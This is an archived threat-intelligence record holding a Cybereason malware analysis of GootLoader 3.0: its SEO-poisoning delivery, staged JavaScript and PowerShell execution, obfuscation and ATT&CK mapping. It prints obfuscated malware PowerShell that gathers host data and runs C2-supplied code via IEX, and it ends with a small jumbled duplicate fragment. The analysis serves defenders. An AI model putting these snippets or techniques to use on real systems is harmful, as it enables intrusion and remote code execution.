{
	"id": "4f1156dc-74ba-4d06-97bb-895b7f00c42f",
	"created_at": "2026-04-06T03:36:17.453439Z",
	"updated_at": "2026-04-10T03:33:12.685714Z",
	"deleted_at": null,
	"sha1_hash": "422e5b4bbd6ee2517cba7bdea3b5bb73a7e392a0",
	"title": "I am Goot (Loader)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 901851,
	"plain_text": "I am Goot (Loader)\r\nBy Cybereason Security Services Team\r\nArchived: 2026-04-06 03:18:50 UTC\r\nCybereason Security Services issues Threat Analysis reports to inform on impacting threats. The Threat Analysis\r\nreports investigate these threats and provide practical recommendations for protecting against them.\r\nIn this Threat Analysis report, Cybereason Security Services investigate the rising activity of the malware\r\nGootLoader.\r\nKEY POINTS\r\nDon't stop me now: GootLoader remains in active use and development by threat actors, with no loss of\r\npopularity in sight.\r\nGootLoader evolved: Updates to the GootLoader payload have resulted in several versions of\r\nGootLoader, with GootLoader 3 currently in active use.\r\nIf it ain't broke, don't fix it: While some of the particulars of GootLoader payloads have changed over\r\ntime, infection strategies and overall functionality remain similar to the malware’s resurgence in 2020.\r\nINTRODUCTION\r\nGootLoader Infection Flow\r\nWhat is GootLoader\r\nGootLoader is a malware loader known to abuse JavaScript to download post-exploitation malware/tools and\r\npersist within the infected machine. GootLoader is a part of the GootKit malware family, which is a banking\r\nTrojan written in NodeJS that has been active since 2014. The threat actors behind GootKit, tracked by Mandiant\r\nas UNC2565, started to shift towards delivering GootLoader instead of the GootKit banking trojan.\r\nThe shift in malware features may have been forthcoming, as threat actors started to deliver other malware such as\r\nREvil ransomware.\r\nGootLoader utilizes SEO poisoning for initial infection in order to distribute its malicious JavaScript payload to\r\nvictims. Many of the distributed files often masquerade as legal documents by including phrases such as\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 1 of 18\n\nagreements, contracts, and forms in the title.\r\nUNC2565\r\nUNC2565, the threat actor tied to GootLoader, employs GootLoader to deploy various post-exploitation malware.\r\nIn the past, the group deployed Cobalt Strike through SEO-manipulated malicious sites in order to gain\r\nunauthorized access. Following entry, UNC2565 engaged in reconnaissance and credential theft, utilizing\r\ntechniques/tools like Kerberoast and BloodHound. \r\nGootLoader primarily functions as an entry point for cyber attacks, often facilitating in delivery of post-exploitations. Some of the malwares delivered in the past are as follows. \r\nBlueCrab Ransomware\r\nCobalt Strike\r\nGootKit\r\nIcedID\r\nKronos\r\nREvil Ransomware \r\nSystemBC\r\nWhile the precise motives of the group remain unclear, the variety in the post-exploitation pattern suggests a\r\npossible financial incentive, as threat actors behind GootLoader appears to be providing the loader to wide-range\r\nof threat actors with different purposes. Threat actors also started to provide their own C2 and lateral movement\r\ntool dubbed GootBot, which can also suggest that the group is expanding their market to gain a wider audience for\r\ntheir financial gains. \r\nUNC2565's victimology appears to target a broad spectrum of victims, leveraging SEO poisoning to attract users\r\nsearching for business-related documents online. The group’s use of GootLoader for initial access suggests that\r\nthey do not discriminate heavily in their selection of targets, affecting a wide range of industry verticals and\r\ngeographic regions. \r\nThe malware's delivery mechanism, which exploits compromised websites to distribute malicious ZIP archives\r\ncontaining obfuscated JavaScript files, points to opportunistic targeting. Victims are likely chosen based on their\r\nlikelihood to search for and download seemingly legitimate business documents from these websites, rather than\r\nbeing selected based on specific industry or geographic location. However, the evolution of GootLoader and the\r\nintroduction of new variants, such as GootBot, suggest an adaptive approach that may refine their targeting over\r\ntime based on the effectiveness of their campaigns and the defenses encountered in different sectors.\r\nTECHNICAL ANALYSIS\r\nThis section covers the technical analysis of the latest GootLoader version 3.0 (as mentioned by Mandiant). The\r\nanalysis consists of the following sections: \r\nOverview: High level overview of the GootLoader infection chain.\r\nGootLoader 3.0 Analysis: Deep dive analysis of GootLoader version 3.0 and introducing code level\r\nanalysis of the loader.\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 2 of 18\n\nComparative Analysis: Comparative analysis of GootLoader, specifically comparing key features between\r\nthe different versions. \r\nOverview\r\n GootLoader 3.0 Execution Flow\r\nThe GootLoader infection chain is simple on its face: sites compromised by threat actors host archives that contain\r\nthe GootLoader JavaScript payload with names that would lure in enterprise users looking for templates, legal\r\ndocuments, etc. Once executed, persistence is established, the second-stage payload is executed, and the third-stage payload is run by PowerShell to collect system information and handle C2 communication.\r\nSimple though it may seem, the compromise of legitimate sites for C2 communication and the heavy obfuscation\r\nof the JavaScript payloads makes signature-based detection a challenge. Further, the obfuscation itself makes\r\npayload analysis difficult to successfully undertake.\r\nInitial Infection\r\nInitial infection occurs when a user downloads an archive from a compromised website and executes the\r\nJavaScript file it contains, which is the first-stage GootLoader payload. As previously observed by Cybereason,\r\nsites that host these archive files leverage Search Engine Optimization (SEO) poisoning techniques to lure in\r\nvictims that are searching for business-related files such as contract templates or legal documents. This infection\r\nvector was observed by Cybereason in our previous report on GootLoader, and the fact that it has not changed\r\nsince that report's publication is a testament to how successful the threat actor believes this kind of drive-by\r\ncompromise to be.\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 3 of 18\n\nFirst-Stage GootLoader Payload\r\nThe first-stage GootLoader payload is notable for its size and heavy obfuscation, with samples observed in the\r\nwild larger than 3.5MB.\r\nExecution\r\nExecution of the Stage 1 payload occurs via the Windows Script Host process wscript, where the malware drops\r\nthe second-stage payload (also a large obfuscated JavaScript file) onto disk and registers a scheduled task to run it.\r\nAt this point the Stage 1 payload execution ends and the Stage 2 payload is immediately executed via its\r\nscheduled task.\r\nSecond-Stage \u0026 Third-Stage Payload Executions\r\nThe Stage 2 payload execution begins with wscript but shifts its execution to an instance of cscript spawned as a\r\nchild process. This done, cscript spawns an instance of PowerShell that deobfuscates a PowerShell script that,\r\nupon execution, initiates both discovery activity and C2 communications.\r\nPersistence\r\nAs previously noted, persistence is established via a scheduled task created by the Stage 1 GootLoader payload,\r\nwith a task name consisting of random English words that are hard-coded in the payload.\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 4 of 18\n\nScheduled Task Created By First-Stage GootLoader Payload\r\nThe task contains parameters to run the Stage 2 GootLoader payload. Upon creation, the scheduled task is\r\nexecuted, the Stage 1 execution is terminated, and the Stage 2 execution begins. After this, the scheduled task is\r\nset to run on user logon.\r\nScheduled Task Parameters For The Second Stage GootLoader Payload\r\nCollection\r\nCollection of infected machine data is undertaken by the Stage 3 GootLoader payload via PowerShell. This\r\nincludes the collection of machine-specific data such as OS version, running processes, disk usage, and\r\nenvironment variables, as well as leveraging a MS-SAMR SamrLookupDomainInSamServer call to collect\r\ninformation about the domain of which the machine is a member.  \r\nGootLoader 3.0 Analysis\r\nThe threat actors behind GootLoader heavily obfuscate the code and break down the execution into three different\r\nstages.\r\nStage 1\r\nThe initial infection file is an obfuscated JavaScript file and the naming convention usually ties to legal/agreement\r\nrelated documents, typically appended with an ID. The following are some examples of files observed in the wild: \r\ntexas mutual combat laws 67138.js\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 5 of 18\n\ncommon law marriage act jamaica 51570.js\r\nnurse practitioner collaborative agreement template nj 8292.js\r\nis samurai sword legal in uk 32330.js\r\npa collective agreement pay 97171.js\r\nStage 1 is responsible for deploying and executing the Stage 2 GootLoader payload. Stage 1 obfuscates itself by\r\nscattering malicious code into legitimate JavaScript libraries to evade suspicions as well as for anti-analysis\r\npurposes. Some of the key points of Stage 1 GootLoader executions are as follows. \r\nScatter and segment obfuscated code\r\nObfuscate execution flow\r\nExecute Stage 2 via Scheduled Task\r\nThe threat actor segments the obfuscated code/strings as variables and scatters them across the JavaScript code.\r\nStage 1 deobfuscates the segmented code/strings by concatenating these segmented variables into one chunk. The\r\nconcatenation procedure hops into various functions as part of execution flow obfuscation. \r\nThe threat actor also obfuscates the execution flow by placing a function into an array as an object. This\r\nmethodology allows threat actors to call specific functions by calling the index of the array during the run time\r\nand hinders the analysis. \r\nExecution Flow Obfuscation By Placing Function Into Array\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 6 of 18\n\nStage 1 consists of a main array which contains all necessary functions and the code executes each function\r\nthrough a while loop. Once deobfuscation of the string/code is done, it then executes the main function within the\r\narray. This function deobfuscates yet another string/code, which is responsible for conducting Stage 2. \r\nDeobfuscation Of Strings / Code\r\nThe final deobfuscated code within the final function is responsible for the following. \r\nDrops Stage 2 GootLoader (JavaScript)\r\nRegisters execution of Stage 2 GootLoader to scheduled task\r\nExecutes scheduled task\r\nThe methodology for the creation of Stage 2 GootLoader varies. However, the end goal of the output is the same. \r\nThe Stage 1 writes Stage 2 GootLoader code into the output file first. This file can have .dat or .log file\r\nextensions depending on the variant of the GootLoader. \r\nThe Stage 1 proceeds to inflate the code by adding strings to the end of the code in Stage 2 output file. The\r\ninflating process can also vary depending on GootLoader variant. For example, some may concatenate the\r\nStage 2 code in a loop, or add random characters to the end of the code. \r\nOnce the concatenation completes, the execution flow updates the filename into a .js file by utilizing the GetFile\r\nmethod. Once this completes, the execution flow registers the execution of dropped Stage 2 scheduled task and\r\nexecutes it by utilizing RegisterTaskDefinition and RunEx methods. \r\nStage 2\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 7 of 18\n\nThe Stage 2 GootLoader payload is a concatenation of the same code inflating the code size, likely a part of anti-analysis method. The obfuscation method is similar to Stage 1, where it obfuscates itself by scattering segmented\r\nobfuscated code. Once Stage 2 concatenates and deobfuscates the segmented code/strings, the execution flow\r\nenters the deobfuscated function, which is an object stored in an array. \r\nFinal Function Prior To Deploying Stage Three\r\nWithin the deobfuscated function, Stage 2 executes in the following order: \r\nChecks if the current executing process is cscript. \r\nIf it is, Stage 2 spawns PowerShell and executes the obfuscated PowerShell function by inputting it\r\nvia exec.StdIn.Writeline.\r\nIf not, then it executes Stage 2 again with cscript. \r\nStage 3\r\nStage 3, the final payload, is a PowerShell script that is responsible for the following: \r\nDiscovery/Reconnaissance activity \r\nC2 communication to download target malware\r\nThe discovery and reconnaissance stage fetches basic host information, which gets compressed by gzip and\r\nencoded with base64 in preparation for being sent to the C2 server. Retrieved information are as follows: \r\nEnvironment variables: Utilizes dir env: command\r\nOS version: Utilizes GWMI commands.\r\nUsed disk space on current session: Utilizes GDR (alias of Get-PSDrive)\r\nList of currently running processes: Utilizes GPS (alias of Get-Process)\r\n$oVzoX = (\"ISFoLDeR|shEll.aPPLiCatioN|nAmeSPAce|itEmS|islINK|NAME|IsFiLEsYstem\").split(\"|\");\r\n    $ZEwBdnB = VkmdJHx((dir env:|where{$_.value.Length -lt 99}|%{($_.name+\"^\"+$_.value)})+(\"OSWMI^\"+\r\n(gwmi Win32_OperatingSystem).caption));\r\n    $TsZy = VkmdJHx(gPs|SELEcT NAME -uNiQUE|%{$_.\"NAME\"});\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 8 of 18\n\n$mVDOW = VkmdJHx(gps|WHeRE{$_.MAInWInDoWTiTLE}|%\r\n{$_.\"nAMe\"+\"^\"+$_.maiNWiNdOWTItLe});\r\n    $IzJiu = VkmdJHx(((new-object -com ($oVzoX[1])).($oVzoX[2])(0)).($oVzoX[3])()|%{\r\n        if($_.($oVzoX[4])){\"0\"+$_.($oVzoX[5])}\r\n        elseif($_.($oVzoX[0])){\"1\"+$_.($oVzoX[5])}\r\n        elseif($_.($oVzoX[6])){\"2\"+[Io.pATH]::gETfIleNAME($_.PAtH)}\r\n        ElSE{\"3\"+$_.($oVzoX[5])}\r\n    });\r\n    $hrnrljKf = VkmdJHx(GdR|whERe{$_.FREe -GT 50000}|%{$_.\"name\"+\"^\"+$_.uSeD});\r\nSnippet Of Discovery Code\r\nStage 3 first fetches the host information, which gets stored in the Cookie header of an HTTPS request and sent to\r\nthe C2 server as the initial C2 communication prior to the delivery of post-exploitation malware. \r\nThe C2 sends a response to the victim’s machine which is a concatenated string with a specified delimiter. This\r\ndelimiter is hardcoded in the beginning of the function. The string is split into an array with the delimiter string\r\nand executes the second index in the array.  \r\n$HtlQpt = \"399DCF7651\";\r\n    $hXLJr = new-obJeCt systEm.iO.STREaMReAdER $lHldi.GetreSpONSe().GetREsponSeStrEaM();\r\n    $CdJwR = ($hXLJr.READtOEnd()) -SPlIT ($HtlQpt);\r\n    If($CdJwR.COuNt -EQ 3){\r\n        IEX($CdJwR[1] -RePlAce \"^\",\"\");\r\n    }\r\nSnippet Of Fetching Response Code\r\nComparative Analysis\r\nThis section covers the comparative analysis of GootLoader, focusing on infection methods, obfuscation methods,\r\nand post-exploitation deployment methods. The GootLoader version 1 in this section refers to and includes the\r\nJavaScript GootKit Loader which was observed in 2020 during the REvil campaign.\r\nAbusing SEO\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 9 of 18\n\nThreat actors have  abused SEO to deliver additional post-exploitation tools/malware since late 2020, the year it\r\nbecame popular when they  started to deploy GootKit and REvi Ransomware together. This methodology has been\r\nutilized constantly ever since and its popularity shows no signs of waning. The detection of SEO poisoning comes\r\nwith various challenges and threat actors consistently utilize this method to mass deploy GootLoader to victims.\r\nThe usage of SEO poisoning may also be targeted specifically against enterprise users, as the Stage 1 GootLoader\r\ntends to contain phrases related to legal documentation. \r\nStage 1 Control Flow Obfuscation\r\nFrom GootKit Loader to GootLoader, all the variants have relied on control flow obfuscation and are utilized in\r\nvarious stages. The obfuscation specifically relies on following two methods:\r\nSegmentation of obfuscated code\r\nPlacement of functions into an array and executing respective index via loop. \r\nThe semantics of the code is similar throughout different variants of GootLoader. The main difference between the\r\nversions is that GootLoader 2.0 and 3.0 hide themselves within legitimate JavaScript files.\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 10 of 18\n\nStage 1 Main Function Logic.\r\nIn each variant, Stage 1 includes the main function which is responsible for looping through an array of functions,\r\nultimately executing the second phase of Stage 1. \r\nStage 2 Control Flow Obfuscation\r\nThe Stage 2 control flow obfuscation differs depending on the version of the GootLoader. GootLoader 1.0 and 2.0\r\ndownload obfuscated Stage 2 payloads from C2 servers, which threat actors store inside of the registry. The\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 11 of 18\n\ndownload occurrence depends on whether the victim machine resides within an Active Directory domain. If the\r\nmachine does reside in a domain, Stage 1 downloads a payload. This functionality changed starting in version 3.0,\r\nwhere Stage 1 deobfuscates/drops and executes the Stage 2 payload via Scheduled Task. \r\nStage 2 Payload size inflation\r\nAs part of the anti-analysis and evasion, the threat actors added a feature in GootLoader 3 to inflate the size of the\r\nStage 2 JavaScript file of the GootLoader. The size can vary depending on the size inflation method, however the\r\nStage 2 JavaScript file tends to get inflated to more than 30MB. \r\nStage 2 JavaScript File Size Inflation\r\nStage 3 PowerShell usage\r\nDepending on the version, the usage of the Stage 3’s PowerShell may differ. GootLoader 1.0 and 2.0 both utilize\r\nPowerShell to reflectively load and execute the .NET based DLL malware as part of post-exploitation. However,\r\nGootLoader 3.0 utilizes PowerShell to do both discovery work as well as C2 communication for backdoor\r\ncommand execution, with the executed commands responsible for post-exploitation activity such as downloading\r\nadditional malware. \r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 12 of 18\n\nExecution Flow Of Stage 3 PowerShell\r\nTrojanized JavaScript Files\r\nGootLoader versions 2.0 and 3.0 trojanize legitimate JavaScript library files as part of their evasion techniques.\r\nThere are various JavaScript libraries in the wild and GootLoader has been observed abusing a variety of them\r\nsince 2022. The following is a list of some of the trojanized JavaScript files that have been identified as\r\nGootLoader: \r\nTrojanized Target Summary\r\nMaplace.js JavaScript library which embed Google Map into a website \r\nxlsx.extendscript.js\r\nExtendedScript for PhotoShop and InDesign, part of JavaScript library for\r\nSheetJS, which is a library to manage spreadsheets.\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 13 of 18\n\njit.js JavaScript Infovis ToolKit. JavaScript library for data visualization.\r\ntui-chart TOAST UI Chart. Data visualization JavaScript library. \r\nmdlComponentHandler.js Material Design Lite JavaScript library.\r\nLodash JavaScript utility libraries. \r\njQuery Popular JavaScript library.\r\nUnderscore.js JavaScript libraries for functional programming helper.\r\nData-Driven Document\r\n(D3)\r\nJavaScript Library for data visualization.  \r\nComparative Chart\r\nGootLoader has received several updates during its life cycle, including changes to evasion and execution\r\nfunctionalities. Here are some of the key functionalities of each version:\r\nTactics\r\nGootLoader\r\n1.0\r\nGootLoader\r\n2.0\r\nGootLoader\r\n3.0\r\nDeobfuscates and drops Stage 2 JavaScript file     ✔\r\nDeobfuscates and drops Stage 3   ✔ ✔\r\nDownloads Stage 2 JavaScript file from C2 ✔ ✔  \r\nExecutes main function of Stage 2 JavaScript via\r\nCScript.\r\n    ✔\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 14 of 18\n\nFetches environment variables     ✔\r\nInitial execution is JavaScript File ✔ ✔ ✔\r\nInflates Stage 2 JavaScript file     ✔\r\nMasquerades as a legitimate JavaScript libraries\r\n(e.g. JQuery)\r\n  ✔ ✔\r\nObfuscates payload inside registry ✔ ✔  \r\nReflectively load post-exploitation malware  ✔ ✔  \r\nScheduled Task usage   ✔ ✔\r\nSEO Poisoning\r\n(Compromised WordPress sites)\r\n✔ ✔ ✔\r\nChecks USERDNSDOMAIN environment variable ✔ ✔  \r\nAnti-analysis methods with WScript Sleep method.  ✔ ✔ ✔\r\nMITRE ATT\u0026CK MAPPING\r\nTactic Techniques / Sub-Techniques Summary\r\nTA0042: Resource\r\nDevelopment\r\nT1584.006 - Compromise\r\nInfrastructure: Web Services\r\nThreat actors abuse compromised web services\r\n(e.g. WordPress) to deliver GootLoader stagers. \r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 15 of 18\n\nTA0042: Resource\r\nDevelopment\r\nT1608.004 - Stage Capabilities:\r\nDrive-by Target\r\nThreat actors abuse SEO poisoning to attract\r\nusers toward drive-by download of GootLoader\r\nstagers. \r\nTA0042: Resource\r\nDevelopment\r\nT1608.006 - Stage Capabilities:\r\nSEO Poisoning\r\nThreat actors abuse SEO poisoning to attract\r\nusers toward drive-by download of GootLoader\r\nstagers. \r\nTA0002:\r\nExecution\r\nT1047 – Windows Management\r\nInstrumentation\r\nThreat actors utilize GWMI command to fetch\r\nOS version. \r\nTA0002:\r\nExecution\r\nT1059.001 - Command and\r\nScripting Interpreter: PowerShell\r\nThreat actors utilize obfuscated PowerShell\r\ncommands for Stage 3 of GootLoader.\r\nTA0002:\r\nExecution\r\nT1059.007 - Command and\r\nScripting Interpreter: JavaScript\r\nThreat actors utilize JavaScript for Stage 1 and\r\nStage 2 of GootLoader.\r\nTA0002:\r\nPersistence\r\nT1053.005- Scheduled Task/Job:\r\nScheduled Task\r\nThreat actors utilize scheduled tasks to execute\r\nStage 2 of GootLoader. \r\nTA0005: Defense\r\nEvasion \r\nT1027 - Obfuscated Files or\r\nInformation\r\nThreat actors obfuscate the JavaScript files by\r\nplacing malicious code into legitimate JavaScript\r\nlibraries and other string obfuscation methods. \r\nTA0005: Defense\r\nEvasion \r\nT1140 - Deobfuscate/Decode Files\r\nor Information\r\nThreat actors obfuscate the JavaScript files by\r\nplacing malicious code into legitimate JavaScript\r\nlibraries and other string obfuscation methods. \r\nTA0005: Defense\r\nEvasion \r\nT1497.003 -\r\nVirtualization/Sandbox Evasion:\r\nTime Based Evasion\r\nThreat actors utilize sleep objects for anti-analysis.\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 16 of 18\n\nTA0007:\r\nDiscovery\r\n \r\nThreat actors fetch environment variables, likely\r\npart of discovery to verify machine’s location. \r\nTA0007:\r\nDiscovery\r\nT1057 - Process Discovery\r\nThreat actors utilize GPS commands to fetch a\r\nlist of currently running processes.\r\nTA0007:\r\nDiscovery\r\nT1652 - Device Driver Discovery\r\nThreat actors utilize GDR command to fetch\r\nusage of disk space.\r\nTA0011 -\r\nCommand and\r\nControl\r\nT1071 - Application Layer\r\nProtocol\r\nThreat actors communicate with C2 in Stage 3 of\r\nGootLoader.\r\nTA0011 -\r\nCommand and\r\nControl\r\nT1132.001 - Standard Encoding\r\nThreat actors encode and compress the data\r\nbeing sent to C2 in Stage 3 of GootLoader.\r\nTA0011 -\r\nCommand and\r\nControl\r\nT1573 - Encrypted Channel\r\nThreat actors utilize TLS to communicate with\r\nC2 in Stage 3 of GootLoader.\r\nAbout The Researchers\r\nRalph Villanueva, Senior Security Analyst, Cybereason Global SOC\r\nRalph Villanueva is a Security Analyst with the Cybereason Global SOC team. He works hunting and combating\r\nemerging threats in the cybersecurity space. His interests include malware reverse engineering, digital forensics,\r\nand studying APTs. He earned his Masters in Network Security from Florida International University. \r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 17 of 18\n\nKotaro Ogino, CTI Analyst\r\nKotaro is a CTI Analyst with the Cybereason Security Operations team. He is involved in threat hunting, threat\r\nintelligence enhancements and Extended Detection and Response (XDR). Kotaro has a bachelor of science degree\r\nin information and computer science\r\nGal Romano, CTI Analyst\r\nGal is a CTI Analyst with the Cybereason Security Operations team. With a robust six-year tenure in cybersecurity\r\nand experience as a SOC Manager, Gal has honed his skills in threat hunting and malware analysis.\r\nSource: https://www.cybereason.com/blog/i-am-goot-loader\r\nhttps://www.cybereason.com/blog/i-am-goot-loader\r\nPage 18 of 18\n\nultimately executing Stage 2 Control the second Flow Obfuscation phase of Stage 1.    \nThe Stage 2 control flow obfuscation differs depending on the version of the GootLoader. GootLoader 1.0 and 2.0\ndownload obfuscated Stage 2 payloads from C2 servers, which threat actors store inside of the registry. The\n   Page 11 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.cybereason.com/blog/i-am-goot-loader"
	],
	"report_names": [
		"i-am-goot-loader"
	],
	"threat_actors": [
		{
			"id": "fc7f0460-0a66-4178-9c5b-75abb22b87b0",
			"created_at": "2023-11-08T02:00:07.15123Z",
			"updated_at": "2026-04-10T02:00:03.427759Z",
			"deleted_at": null,
			"main_name": "UNC2565",
			"aliases": [
				"Hive0127"
			],
			"source_name": "MISPGALAXY:UNC2565",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775446577,
	"ts_updated_at": 1775791992,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/422e5b4bbd6ee2517cba7bdea3b5bb73a7e392a0.pdf",
		"text": "https://archive.orkl.eu/422e5b4bbd6ee2517cba7bdea3b5bb73a7e392a0.txt",
		"img": "https://archive.orkl.eu/422e5b4bbd6ee2517cba7bdea3b5bb73a7e392a0.jpg"
	}
}